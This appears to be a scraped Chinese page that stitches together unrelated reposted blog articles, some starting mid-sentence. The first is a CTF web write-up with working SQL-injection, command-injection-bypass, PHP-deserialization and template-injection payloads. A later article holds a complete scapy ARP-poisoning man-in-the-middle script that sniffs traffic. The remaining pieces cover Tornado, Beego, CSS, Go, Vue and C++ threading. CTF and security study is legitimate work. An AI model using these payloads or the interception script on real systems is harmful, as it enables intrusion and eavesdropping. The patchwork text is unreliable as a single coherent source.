构造方法self代表对象,其他是对象的属性 request.args.get(param) 提取get方法传入的，参数名叫param对应得值 request.cookies.get(“action”) 提取cookie信息中的，名为action得对应值 hashlib.md5().hexdigest() hashlib.md5()获取一个md5加密算法对象，hexdigest()是获得加密后的16进制字符串 urllib.unquote(） 将url编码解码 urllib.urlopen() 读取网络文件参数可以是url json.dumps Python 对象编码成 JSON 字符串 这个题先放一下… [极客大挑战 2019]EasySQL 进入题目链接 直接上万能密码 用户随意 admin1' or 1; 得到flag flag{7fc65eb6-985b-494a-8225-de3101a78e89} [极客大挑战 2019]Havefun 进入题目链接 老套路 去F12看看有什么东西 很好 逮住了 获取FLAG的条件是cat=dog，且是get传参 flag就出来了 flag{779b8bac-2d64-4540-b830-1972d70a2db9} [极客大挑战 2019]Secret File 进入题目链接 老套路 先F12查看 发现超链接 直接逮住 既然已经查阅结束了 中间就肯定有一些我们不知道的东西 过去了 上burp看看情况 我们让他挺住 逮住了：secr3t.php 访问一下 简单的绕过 就可以了 成功得到一串字符 进行base解密即可 成功逮住flag flag{ed90509e-d2d1-4161-ae99-74cd27d90ed7} [ACTF2020 新生赛]Include 根据题目信息 是文件包含无疑了 直接点击进来 用php伪协议 绕过就可以了 得到一串编码 base64解密即可 得到flag flag{c09e6921-0c0e-487e-87c9-0937708a78d7} 2018]easy_tornado 都点击一遍 康康 直接filename变量改为：fllllllllllllag 报错了 有提示 render() 是一个渲染函数 具体看这里 就用到SSTI模板注入了 具体看这里 尝试模板注入： /error?msg={ {1} } 发现存在模板注入 md5(cookie_secret+md5(filename)) 分析题目： 1.tornado是一个python的模板，可能会产生SSTI注入漏洞2.flag在/fllllllllllllag中3.render是python中的一个渲染函数，也就是一种模板，通过调用的参数不同，生成不同的网页4.可以推断出filehash的值为md5(cookie_secret+md5(filename)) 根据目前信息，想要得到flag就需要获取cookie_secret 因为tornado存在模版注入漏洞，尝试通过此漏洞获取到所需内容 根据测试页面修改msg得值发现返回值 可以通过msg的值进行修改,而在 taornado框架中存在cookie_secreat 可以通过/error?msg={ {handler.settings} }拿到secreat_cookie 综合以上结果 拿脚本跑一下 得到filehash: ed75a45308da42d3fe98a8f15a2ad36a 一直跑不出来 不知道为啥子 [极客大挑战 2019]LoveSQL 万能密码尝试 直接上万能密码 用户随意 admin1' or 1; 开始正常注入： 查字段：1' order by 3 经过测试 字段为3 查看回显:1’ union select 1,2,3 查数据库 1' union select 1,2,group_concat(schema_name) from information_schema.schemata 查表： [GXYCTF2019]Ping Ping Ping 考察：RCE的防护绕过 直接构造：?ip=127.0.0.1;ls 简单的fuzz一下 就发现=和$没有过滤 所以想到的思路就是使用$IFS$9代替空格，使用拼接变量来拼接出Flag字符串： 构造playload ?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b 看看他到底过滤了什么：?ip=127.0.0.1;cat$IFS$1index.php 一目了然过滤了啥，flag字眼也过滤了，bash也没了，不过sh没过滤： 继续构造payload： ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 查看源码，得到flag flag{1fe312b4-96a0-492d-9b97-040c7e333c1a} [RoarCTF 2019]Easy Calc 进入题目链接 查看源码 发现calc.php 利用PHP的字符串解析特性Bypass，具体看这里 HP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事： 1.删除空白符2.将某些字符转换为下划线（包括空格） scandir()：列出参数目录中的文件和目录 发现/被过滤了 ，可以用chr('47')代替 calc.php? num=1;var_dump(scandir(chr(47))) 这里直接上playload calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) flag{76243df6-aecb-4dc5-879e-3964ec7485ee} [极客大挑战 2019]Knife 进入题目链接 根据题目Knife 还有这个一句话木马 猜想尝试用蚁剑连接 测试连接成功 确实是白给了flag [ACTF2020 新生赛]Exec 直接ping 发现有回显 构造playload： 127.0.0.1;cat /flag 成功拿下flag flag{7e582f16-2676-42fa-8b9d-f9d7584096a6} [极客大挑战 2019]PHP 进入题目链接 它提到了备份文件 就肯定是扫目录 把源文件的代码 搞出来 上dirsearch 下载看这里 很简单的使用方法 用来扫目录 -u 指定url -e 指定网站语言 -w 可以加上自己的字典，要带路径 -r 递归跑(查到一个目录后，重复跑) 打开index.php文件 分析这段内容 1.加载了一个class.php文件 2.采用get方式传递一个select参数 3.随后将之反序列化 打开class.php <?phpinclude 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();} }}?> 根据代码的意思可以知道，如果password=100，username=admin 在执行_destruct()的时候可以获得flag 构造序列化 <?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;} }$a = new Name('admin', 100);var_dump(serialize($a));?> 得到了序列化 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 但是 还有要求 1.跳过__wakeup()函数 在反序列化字符串时，属性个数的值大于实际属性个数时，就可以 2.private修饰符的问题 private 声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时，类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度 构造最终的playload ?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;} [极客大挑战 2019]Http 进入题目链接 查看 源码 发现了 超链接的标签 说我们不是从https://www.Sycsecret.com访问的 进入http://node3.buuoj.cn:27883/Secret.php 抓包修改一下Referer 执行一下 随后提示我们浏览器需要使用Syclover， 修改一下User-Agent的内容 就拿到flag了 [HCTF 2018]admin 进入题目链接 这道题有三种解法 1.flask session 伪造 2.unicode欺骗 3.条件竞争 发现 登录和注册功能 随意注册一个账号啦 登录进来之后 登录 之后 查看源码 发现提示 猜测 我们登录 admin账号 即可看见flag 在change password页面发现 访问后 取得源码 第一种方法： flask session 伪造 具体，看这里 flask中session是存储在客户端cookie中的，也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是，签名的作用是防篡改，而无法防止被读取。而flask并没有提供加密操作，所以其session的全部内容都是可以在客户端读取的，这就可能造成一些安全问题。 [极客大挑战 2019]BabySQL 进入题目链接 对用户名进行测试 发现有一些关键字被过滤掉了 猜测后端使用replace()函数过滤 11' oorr 1=1 直接尝试双写 万能密码尝试 双写 可以绕过 查看回显： 1' uniunionon selselectect 1,2,3 over！正常 开始注入 爆库 爆列 爆表 爆内容 本篇文章为转载内容。原文链接：https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...的Web应用程序以及处理非阻塞I/O操作，特别适合需要实时交互的应用和服务场景，如Web聊天应用、实时分析系统等。在Tornado中，开发者可以创建高度并发的服务，轻松应对海量的同时连接请求。 依赖包 , 在计算机编程领域，尤其是像Tornado这样的软件项目中，依赖包是指那些为了保证项目正常运行而必须预先安装的其他第三方库或组件。例如，在运行Tornado服务器时，可能需要诸如asyncio、httptools等一系列相关的Python库作为支撑。如果这些依赖包缺失或者版本不兼容，就可能导致Tornado服务器无法启动。 路径配置 , 路径配置是程序运行时对文件或目录路径的一种设定方式，确保程序能够正确找到所需的资源或执行环境。在Tornado服务器的上下文中，路径配置可能涉及设置项目的根目录、静态文件目录、日志文件输出路径等。例如，通过Python代码中的os.chdir()函数更改当前工作目录至项目根目录，确保Tornado能正确加载应用模块及配置文件，否则可能导致服务器启动失败。

...例子中，当用户访问根路径时，我们首先设置了一个默认控制器。接着，我们使出一个叫做“Redirect”的小妙招，把所有那些找不到对应路径的请求，都顺手牵羊地引导到"/welcome"这个页面去。 三、动态添加路由 在实际开发中，我们可能需要根据一些条件动态地添加路由。这就需要用到Beego的AddRouter函数。 以下是一个简单的动态添加路由的例子： go func main() { router := beego.NewDefaultRouter() // 添加静态路由 router.Get("/", func(c context.Context) { c.String(200, "Hello World") }) // 动态添加路由 if len(os.Args) > 1 { path := os.Args[1] router.Get(path, func(c context.Context) { c.String(200, "Welcome to %s", path) }) } // 启动服务器 http.ListenAndServe(":8080", router) } 在这个例子中，如果命令行参数中有参数，那么我们就动态地添加了一个新的路由。这个新的路由是根据命令行参数生成的，所以它是动态的。 四、总结 总的来说，Beego框架中的动态路由是非常强大且灵活的。它可不光能帮我们飞快地搭起那些复杂的应用程序，更能让我们对路由的掌控和管理变得轻松加愉快，就像指挥交通一样得心应手。通过合理的路由设计，我们可以大大提高我们的应用的质量和效率。在接下来的日子，无论是学习还是工作，我真心希望大家能把这些工具和技术玩得溜溜的，让它们发挥出最大的能量，帮助大家创作出更多令人眼前一亮、拍案叫绝的好作品。

... openAndClose(){ var el = document.getElementById("box"); if(window.getComputedStyle(el).height == "0px"){ el.style.height = "300px"; }else{ el.style.height="0px"; } } //这样虽然实现了效果，但是需要提前知道容器的高度 //如果设置height为auto,然而transition并没有效果 transition: max-height 600ms; 将transition的属性换成max-height,max-height会限制元素的height小于这个值，所以我们将关闭状态的值设成0，打开状态设置成足够大 //思路示例 //css .box { height: 300px; max-height: 0px; transition: max-height 600ms; overflow: hidden; background: 4b504c; } //html ... ... //js function openAndClose(){ var el = document.getElementById("box"); if(window.getComputedStyle(el).maxHeight == "0px"){ el.style.maxHeight = "1040px"; }else{ el.style.maxHeight="0px"; } } //这样过程中就会有个不尽人意的地方，关闭的时候总会有点延迟 //原因可能是maxHeight到height这个值得过渡过程耗费了时间 //思路：取消transition==》设置height：auto==》 //获取容器真实height==》设置height：0==》 //设置transition==》触发浏览器重排==》 //设置容器真实height function openAndClose(){ var el = document.getElementById("box"); if(window.getComputedStyle(el).height == "0px"){ // mac Safari下，貌似auto也会触发transition, 故要none下~ el.style.transition = "none"; el.style.height = "auto"; var targetHeight = window.getComputedStyle(el).height; el.style.transition = "height 600ms" el.style.height = "0px"; el.offsetWidth;//触发浏览器重排 el.style.height = targetHeight; }else{ el.style.height="0px"; } } 其他 getComputedStyle() 方法获取的是最终应用在元素上的所有CSS属性对象|MDN 本篇文章为转载内容。原文链接：https://blog.csdn.net/weixin_39725844/article/details/117728423。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...TP请求）能够被完整处理完毕后再结束进程的策略。在Web服务器中，这意味着当接收到系统终止信号时，服务器不会立即停止响应，而是等待已建立连接的所有请求完成后再关闭，从而避免数据丢失、不完整的事务处理以及用户体验下降等问题。 Go Iris , Go Iris是用Go语言编写的高性能、轻量级且功能丰富的Web框架。它提供了易于使用的API和强大的中间件支持，使开发者能够快速构建安全、稳定且高效的Web应用程序。Iris框架内建了对Graceful Shutdown的支持，使得开发者能轻松实现服务在接收到关闭信号时的优雅退出。 SIGINT/SIGTERM , SIGINT和SIGTERM是Unix/Linux操作系统中用于向进程发送信号的术语。其中，SIGINT通常由用户按下Ctrl+C组合键触发，表示请求中断程序；而SIGTERM则是程序终止信号，通常由系统管理员或其他程序发出，用于通知目标进程应该以正常方式结束自己的执行。在本文的上下文中，Go应用通过os/signal包监听这些信号来实现Graceful Shutdown，在接收到SIGINT或SIGTERM时启动优雅关机流程。

os模块 , os是Python内置的标准库之一，全称为operating system（操作系统），提供了与操作系统进行交互的一系列函数，如读写文件、创建目录、执行系统命令等。在本文中，作者使用os模块中的system()函数来执行ping命令以检测网络连通性，并通过模拟命令行操作实现WiFi的切换。 subprocess.Popen , subprocess是Python的一个标准库，其中Popen类用于创建新的子进程，执行指定的命令或程序，并可以控制子进程的输入输出以及获取其返回状态。在文章中，作者通过调用subprocess.Popen方法执行Windows系统命令netsh wlan show interfaces来获取当前连接的WiFi信息。 netsh wlan , netsh（网络外壳）是Windows操作系统中提供网络配置和故障排除功能的命令行工具，wlan子命令集主要用于无线局域网（Wi-Fi）的管理，包括查看、创建、修改和删除无线网络接口及配置。文中提到的几个命令如netsh wlan show interfaces用于查看当前无线网络接口的状态，而netsh wlan connect name=wifi名称则是用于连接特定名称的无线网络。 ping命令 , ping是一种常用的网络诊断工具，在Linux/Unix系统和Windows系统中均有实现。它通过发送ICMP（Internet Control Message Protocol，互联网控制消息协议）回显请求数据包到目标主机并监听回应，以此判断两台计算机之间的网络连通性。在该篇文章中，作者编写了一个check_ping函数，利用ping命令对百度服务器IP地址进行连通性测试，如果无法ping通则认为网络存在问题，需要进行WiFi切换。

...BC….依次递推。 Windows（VC9下编译运行通过）： include <iostream>include <windows.h>include <process.h>using namespace std;define PRINT_TIMES 10// 考虑到可读性 多写几个handle// define THREAD_NUMS 3// 用于打印字符控制，有点类似循环链表struct sPrintControl{char cPrint;HANDLE hEventThis;HANDLE hEventNext;};// 按照顺序打印字符UINT WINAPI vPrintCharWithSeq(LPVOID p_psPrintControl){sPrintControl l_psPrintControl = static_cast<sPrintControl>(p_psPrintControl);char l_cChar = l_psPrintControl->cPrint;for (int i = 0; i < PRINT_TIMES; i++){// wait for printWaitForSingleObject(l_psPrintControl->hEventThis, INFINITE);cout<<"ThreadId:"<<GetCurrentThreadId()<<' '<<i<<l_cChar<<endl;// signal the next threadSetEvent(l_psPrintControl->hEventNext);}return 0;}int main(){HANDLE l_hThreadA = NULL;HANDLE l_hThreadB = NULL;HANDLE l_hThreadC = NULL;HANDLE l_hThreadAEvent = NULL;HANDLE l_hThreadBEvent = NULL;HANDLE l_hThreadCEvent = NULL;// 自动重置，从ThreadA开始打印l_hThreadAEvent = CreateEvent(NULL, FALSE, TRUE, NULL);l_hThreadBEvent = CreateEvent(NULL, FALSE, FALSE, NULL);l_hThreadCEvent = CreateEvent(NULL, FALSE, FALSE, NULL);sPrintControl l_sPrintControl[3] = { {'A', l_hThreadAEvent, l_hThreadBEvent}, {'B', l_hThreadBEvent, l_hThreadCEvent}, {'C', l_hThreadCEvent, l_hThreadAEvent} };l_hThreadA = (HANDLE)_beginthreadex(NULL, 0, vPrintCharWithSeq, &l_sPrintControl[0], THREAD_PRIORITY_NORMAL, NULL);l_hThreadB = (HANDLE)_beginthreadex(NULL, 0, vPrintCharWithSeq, &l_sPrintControl[1], THREAD_PRIORITY_NORMAL, NULL);l_hThreadC = (HANDLE)_beginthreadex(NULL, 0, vPrintCharWithSeq, &l_sPrintControl[2], THREAD_PRIORITY_NORMAL, NULL);// 等待线程结束WaitForSingleObject(l_hThreadA, INFINITE);WaitForSingleObject(l_hThreadB, INFINITE);WaitForSingleObject(l_hThreadC, INFINITE);// 释放CloseHandle(l_hThreadA);CloseHandle(l_hThreadB);CloseHandle(l_hThreadC);CloseHandle(l_hThreadAEvent);CloseHandle(l_hThreadBEvent);CloseHandle(l_hThreadCEvent);return 0;} Linux： 感谢Jinhao的帮助。用pthread_cond_t解决了。实际上测试用sem_t还快一点。因为用sem_t的方法类似windows下面用Event就不贴代码了。 线程关键代码： void thread(thr_id t){pthread_mutex_lock(t->mutex); //这个lock相当重要sem_post(t->sem);pthread_cond_wait(t->self_cond, t->mutex);pthread_mutex_unlock(t->mutex);//真正开始for(int i = 0; i < 10; ++i){pthread_mutex_lock(t->mutex);std::cout<<t->id<<std::flush;pthread_cond_signal(t->next_cond);if(i < 9) //输出最后一遍的时候,不用再wait而是退出线程pthread_cond_wait(t->self_cond, t->mutex);pthread_mutex_unlock(t->mutex);} } Jinhao：现在C唤醒A的时候,能保证A是wait的状态.因为A在cond_wait的时候,B才能获得锁,当b在cond_wait的时候,C才获得锁.所以当C cond_signal A时, A必然是cond_wait的。 全部代码如下： include <iostream>include <stdlib.h>include <pthread.h>include <stdio.h>include <semaphore.h>using namespace std;struct thr_id{char id;sem_t sem;pthread_mutex_t mutex;pthread_cond_t self_cond;pthread_cond_t next_cond;};void thread(thr_id t){pthread_mutex_lock(t->mutex);sem_post(t->sem);pthread_cond_wait(t->self_cond, t->mutex);pthread_mutex_unlock(t->mutex);for(int i = 0; i < 10000; ++i){pthread_mutex_lock(t->mutex);std::cout<<t->id<<std::flush;pthread_cond_signal(t->next_cond);if(i < 9999)pthread_cond_wait(t->self_cond, t->mutex);pthread_mutex_unlock(t->mutex);} }typedef void (PRINTTHREADFUNC) (void);int main(){pthread_t th_a, th_b, th_c;sem_t sem;sem_init(&sem, 0, 0);pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;pthread_cond_t cond_a = PTHREAD_COND_INITIALIZER;pthread_cond_t cond_b = PTHREAD_COND_INITIALIZER;pthread_cond_t cond_c = PTHREAD_COND_INITIALIZER;thr_id thrids[3] = { {'a', &sem, &mutex, &cond_a, &cond_b},{'b', &sem, &mutex, &cond_b, &cond_c},{'c', &sem, &mutex, &cond_c, &cond_a} };pthread_create(&th_a, NULL, reinterpret_cast<PRINTTHREADFUNC>(thread), &thrids[0]);pthread_create(&th_b, NULL, reinterpret_cast<PRINTTHREADFUNC>(thread), &thrids[1]);pthread_create(&th_c, NULL, reinterpret_cast<PRINTTHREADFUNC>(thread), &thrids[2]);for(int i = 0; i < 3; ++i){sem_wait(&sem);}pthread_mutex_lock(&mutex);pthread_cond_signal(thrids[0].self_cond);pthread_mutex_unlock(&mutex);pthread_join(th_a, NULL);pthread_join(th_b, NULL);pthread_join(th_c, NULL);sem_destroy(&sem);pthread_cond_destroy(&cond_a);pthread_cond_destroy(&cond_b);pthread_cond_destroy(&cond_c);return 0;} 本篇文章为转载内容。原文链接：https://blog.csdn.net/enjolras/article/details/7456540。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

Vue处理401：从零开始，解决实际问题 大家好，我是你们的老朋友，一个热爱编程的技术宅。嘿，大家好！今天我想聊聊在做Vue项目时碰到的一个常见问题——怎么才能酷炫地解决HTTP 401未授权错误呢？这个问题看似简单，但处理起来却需要一些技巧。让我们一起深入探讨，看看如何让我们的应用更加健壮。 1. 什么是401错误？ 首先，我们得了解一下401到底是个什么鬼。在HTTP协议中，401是一个标准的状态码，表示请求需要用户认证。简单说吧，就是服务器跟你说：“哥们儿，你没权限看这个东西！”这种情况一般出现在你还没登录，或者是登录信息已经失效了。 2. 初次尝试 直接处理 我们先来看一个最简单的处理方式。假设我们在某个组件中发起了一次请求： javascript // 假设这是我们的axios配置 import axios from 'axios'; axios.get('/api/some-data') .then(response => { console.log('数据获取成功', response.data); }) .catch(error => { if (error.response.status === 401) { console.error('401错误：未授权'); // 这里可以跳转到登录页面 window.location.href = '/login'; } else { console.error('其他错误', error); } }); 这种方式虽然能解决问题，但每次请求都要重复这段代码，显得不够优雅。我们需要一个更通用的方法来处理这个问题。 3. 使用拦截器 一次设置，处处生效 Vue项目中，我们通常会使用axios作为HTTP客户端。Axios有个很酷的拦截器功能，让我们可以在请求发出前后做一些全局的处理，特别方便。我们可以在main.js中设置拦截器： javascript import Vue from 'vue'; import App from './App.vue'; import axios from 'axios'; import router from './router'; Vue.config.productionTip = false; // 设置axios的拦截器 axios.interceptors.response.use( response => response, error => { if (error.response.status === 401) { // 处理401错误 console.error('401错误：未授权'); // 跳转到登录页面 router.push({ name: 'Login' }); } return Promise.reject(error); } ); new Vue({ router, render: h => h(App) }).$mount('app'); 这样，无论你在项目的哪个地方发起请求，只要遇到401错误，都会自动跳转到登录页面。是不是很酷？ 4. 处理边缘情况 重新登录后跳转回原页面 但是，如果用户在登录后还想回到之前访问的页面怎么办？我们可以利用路由的参数来传递信息。例如，在跳转到登录页时，我们可以带上当前的路由路径： javascript router.push({ name: 'Login', query: { redirect: router.currentRoute.fullPath } }); 然后在登录成功的回调中，我们可以根据这个参数进行跳转： javascript methods: { login() { // 登录逻辑 axios.post('/api/login', this.credentials) .then(() => { const redirect = this.$route.query.redirect; if (redirect) { this.$router.push(redirect); } else { this.$router.push('/'); } }) .catch(error => { console.error('登录失败', error); }); } } 这样一来，用户在登录成功后就能返回到之前访问的页面了。 5. 总结与反思 通过以上的讨论，我们看到了如何在Vue项目中处理401未授权错误。从一开始的简单应对，到后来用axios拦截器，最后搞定那些特殊状况，每一步都让我们离那个完美的解决办法更近了点儿。在这过程中，我真是领悟到，编程可不只是敲代码那么简单，还得想到各种可能出现的状况，然后还得想出漂亮利索的解决办法。 希望这篇文章对你有所帮助，如果你有任何问题或更好的建议，欢迎在评论区留言交流！

...是将IP地址，转换为MAC地址，类似操作系统中的MMU（内存管理单元），将虚拟地址，转换为物理地址。 其中邻居子系统相当于地址解析协议（IPv4的ARP协议，IPv6的ND(Neighbor discover)协议）的一个通用抽象，可以在其上实现ARP等各种地址解析协议 邻居子系统的数据结构 struct neighbour{....................} neighbour结构存储的是IP地址与MAC地址的对应关系，当前状态 struct neighbour_table{....................} 每一个地址解析协议对应一个neighbour_table,我们可以查看ARP的初始函数arp_init，其会创建arp_tbl neighbour_table 包含 neighbour 邻居子系统的状态转换 其状态信息是存放在neighbour结构的nud_state字段的 可以分析neigh_update与neigh_timer_handler函数，来理解他们之间的转换关系。 NUD_NONE: 表示刚刚调用neigh_alloc创建neighbour NUD_IMCOMPLETE 发送一个请求，但是还未收到响应。如果经过一段时间后，还是没有收到响应，则查看发送请求数是否超过上限，如果超过则转到NUD_FAILED,否则继续发送请求。如果接受到响应则转到NUD_REACHABLE NUD_REACHABLE: 表示目标可达。如果经过一段时间，未有到达目标的数据包，则转为NUD_STALE状态 NUD_STALE 在此状态，如果有用户准备发送数据，则切换到NUD_DELAY状态 NUD_DELAY 该状态会启动一个定时器，然后接受可到达确认，如果定时器过期之前，收到可到达确认，则将状态切换到NUD_REACHABLE,否则转换到NUD_PROBE状态。 NUD_PROBE 类似NUD_IMCOMPLETE状态 NUD_FAILED 不可达状态，准备删除该neighbour 各种状态之间的切换，也可以通过scapy构造数据包发送并通过Linux 下的 ip neigh show 命令查看 ARP接收处理函数分析 ARP的接收处理函数为arp_process(位于net/ipv4/arp.c)中 我们分情况讨论arp_process的处理函数并结合scapy发包来分析处理过程 当为ARP请求数据包，且能找到到目的地址的路由 如果不是发送到本机的ARP请求数据包，则看是否需要进行代理ARP处理 如果是发送到本机的ARP请求数据包，则分neighbour的状态进行讨论，但是通过分析发现，不论当前neighbour是处于何种状态（NUD_FAILD、NUD_NONE除外），则都会将状态切换成 NUD_STALE状态，且mac地址不相同时，则会切换到本次发送方的mac地址 当为ARP请求数据包，不能找到到目的地址的路由 不做任何处理 当为ARP响应数据包 如果没有对应的neighbour，则不做任何处理。如果该neighbour存在，则将状态切换为NUD_REACHABLE，MAC地址更换为本次发送方的地址 中间人攻击原理 通过以上分析，可以向受害主机A发送ARP请求数据包，其中请求包中将源IP地址，设置成为受害主机B的IP地址，这样，就会将主机A中的B的 MAC缓存，切换为我们的MAC地址。 同理，向B中发送ARP请求包，其中源IP地址为A的地址 然后，我们进行ARP数据包与IP数据包的中转，从而达到中间人攻击。 使用Python scapy包，实现中间人攻击： 环境 python3 ubuntu 14.04 VMware 虚拟专用网络 代码 !/usr/bin/python3from scapy.all import import threadingimport timeclient_ip = "192.168.222.186"client_mac = "00:0c:29:98:cd:05"server_ip = "192.168.222.185"server_mac = "00:0c:29:26:32:aa"my_ip = "192.168.222.187"my_mac = "00:0c:29:e5:f1:21"def packet_handle(packet):if packet.haslayer("ARP"):if packet.pdst == client_ip or packet.pdst == server_ip:if packet.op == 1: requestif packet.pdst == client_ip:pkt = Ether(dst=client_mac,src=my_mac)/ARP(op=1,pdst=packet.pdst,psrc=packet.psrc)sendp(pkt)if packet.pdst == server_ip:pkt = Ether(dst=server_mac,src=my_mac)/ARP(op=1,pdst=packet.pdst,psrc=packet.psrc)sendp(pkt)pkt = Ether(dst=packet.src)/ARP(op=2,pdst=packet.psrc,psrc=packet.pdst) replysendp(pkt)if packet.op == 2: replyif packet.pdst == client_ip:pkt = Ether(dst=client_mac,src=my_mac)/ARP(op=2,pdst=packet.pdst,psrc=packet.psrc)sendp(pkt)if packet.pdst == server_ip:pkt = Ether(dst=server_mac,src=my_mac)/ARP(op=2,pdst=packet.pdst,psrc=packet.psrc)sendp(pkt)if packet.haslayer("IP"):if packet[IP].dst == client_ip or packet[IP].dst == server_ip:if packet[IP].dst == client_ip:packet[Ether].dst=client_macif packet[IP].dst == server_ip:packet[Ether].dst=server_macpacket[Ether].src = my_macsendp(packet)if packet.haslayer("TCP"):print(packet[TCP].payload)class SniffThread(threading.Thread):def __init__(self):threading.Thread.__init__(self)def run(self):sniff(prn = packet_handle,count=0)class PoisoningThread(threading.Thread):__src_ip = ""__dst_ip = ""__mac = ""def __init__(self,dst_ip,src_ip,mac):threading.Thread.__init__(self)self.__src_ip = src_ipself.__dst_ip = dst_ipself.__mac = macdef run(self):pkt = Ether(dst=self.__mac)/ARP(pdst=self.__dst_ip,psrc=self.__src_ip)srp1(pkt)print("poisoning thread exit")if __name__ == "__main__":my_sniff = SniffThread()client = PoisoningThread(client_ip,server_ip,client_mac)server = PoisoningThread(server_ip,client_ip,server_mac)client.start()server.start()my_sniff.start()client.join()server.join()my_sniff.join() client_ip 为发送数据的IP server_ip 为接收数据的IP 参考质料 Linux邻居协议 学习笔记 之五 通用邻居项的状态机机制 https://blog.csdn.net/lickylin/article/details/22228047 转载于:https://www.cnblogs.com/r1ng0/p/9861525.html 本篇文章为转载内容。原文链接：https://blog.csdn.net/weixin_30278237/article/details/96265452。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...是在Go语言里，错误处理可是个大事儿，因为这能促使开发者写出更稳当、更靠谱的代码。今天我们要聊的是“错误信息”——这东西可不只是一个简单的提示，它就像是侦探破案时的关键线索，能帮我们找到问题的症结所在。 想象一下，当你在编写一个复杂的网络应用程序时，如果某个请求失败了，你会如何追踪问题？如果没有清晰的错误信息，你可能会陷入无尽的调试之中。所以，要是能好好处理和展示错误信息，不仅能让我们程序变得更易于维护，还能大大提升我们的工作效率，省去很多头疼的时刻呢。 2. Go语言中的错误处理 Go语言有一个非常独特且强大的错误处理机制，那就是通过error接口来表示错误。这个接口非常简单，只有一个方法Error()，用于返回一个字符串，这个字符串就是错误信息。 go type error interface { Error() string } 这种设计使得Go语言在处理错误时非常灵活。我们可以自定义任何类型的错误，并通过Error()方法返回具体的错误信息。但是有个重点啊：错误信息得尽量详细清楚，这样我们才能迅速找到问题出在哪。 2.1 错误信息的重要性 错误信息不仅仅是给程序员看的，它还可能被最终用户看到。因此，在编写错误信息时，我们需要考虑两方面： - 面向开发者：确保错误信息足够具体，能够帮助开发者迅速定位问题。 - 面向用户：保持友好性和简洁性，避免暴露过多的技术细节。 举个例子，假设你的应用程序需要从数据库读取数据，但数据库连接失败了。一个好的错误信息可能是：“无法连接到数据库，请检查您的网络连接或联系管理员。这种信息不仅说清楚了问题的来龙去脉（就是数据库连不上），还给咱指了个大概的解决方向呢。 3. 实践中的错误处理 在实际项目中，错误处理是一个贯穿始终的过程。从最简单的错误检查，到复杂的错误链路追踪，每一步都至关重要。让我们来看几个具体的例子，看看如何在Go中实现有效的错误处理。 3.1 基础的错误检查 最基本也是最常见的错误处理方式，就是在函数调用后立即检查返回的错误值。如果错误不为nil，则进一步处理。 go func main() { file, err := os.Open("test.txt") if err != nil { fmt.Println("打开文件失败:", err) return } defer file.Close() // 继续处理文件... } 在这个例子中，我们尝试打开一个名为“test.txt”的文件。如果文件不存在或者权限不足等导致操作失败，os.Open()会返回一个非空的错误对象。通过检查这个错误对象，我们可以及时发现并处理问题。 3.2 使用错误链路 在复杂的应用中，一个操作可能会触发多个后续步骤，每个步骤都可能产生新的错误。在这种情况下，错误链路（即错误传播）变得尤为重要。我们可以利用Go语言的多返回值特性来实现这一点。 go func readConfig(filePath string) (map[string]string, error) { file, err := os.Open(filePath) if err != nil { return nil, fmt.Errorf("打开配置文件失败: %w", err) } defer file.Close() var config map[string]string decoder := json.NewDecoder(file) if err := decoder.Decode(&config); err != nil { return nil, fmt.Errorf("解析配置文件失败: %w", err) } return config, nil } func main() { config, err := readConfig("config.json") if err != nil { log.Fatalf("读取配置文件失败: %v", err) } // 使用配置... } 在这个例子中，readConfig函数尝试打开并解析一个JSON格式的配置文件。如果任何一步失败，我们都会返回一个包含原始错误的错误对象。这样做不仅可以让错误信息更加完整，还便于我们在调用方进行统一处理。 3.3 自定义错误类型 虽然标准库提供的error接口已经足够强大，但在某些场景下，我们可能需要更丰富的错误信息。这时，可以定义自己的错误类型来扩展功能。 go type MyError struct { Message string Code int } func (e MyError) Error() string { return fmt.Sprintf("错误代码%d: %s", e.Code, e.Message) } func doSomething() error { return &MyError{Message: "操作失败", Code: 500} } func main() { err := doSomething() if err != nil { log.Printf("发生错误: %v", err) } } 